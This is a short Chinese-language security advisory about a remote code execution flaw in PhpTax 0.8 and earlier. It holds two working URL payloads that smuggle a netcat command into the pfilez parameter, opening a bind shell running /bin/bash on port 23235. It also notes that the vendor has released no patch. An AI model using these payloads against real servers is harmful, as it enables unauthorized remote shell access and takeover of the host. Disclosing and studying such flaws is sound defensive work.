发布日期:2012-10-15
更新日期:2012-10-18
受影响系统:
sourceforge PhpTax <= 0.8
描述:
--------------------------------------------------------------------------------
PhpTax是美国收入所得税计算软件。
PhpTax在实现上存在安全漏洞,可被利用导致远程代码执行攻击。
<*来源:Jean Pascal Pereira
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Bindshell on port 23235 using netcat:
?pfilez=xxx;%20nc%20-l%20-v%20-p%2023235%20-e%20/bin/bash;&pdf=make
** Exploit-DB Verified:**
?pfilez=1040d1-pg2.tob;nc%20-l%20-v%20-p%2023235%20-e%20/bin/bash;&pdf=make
建议:
--------------------------------------------------------------------------------
厂商补丁:
sourceforge
-----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: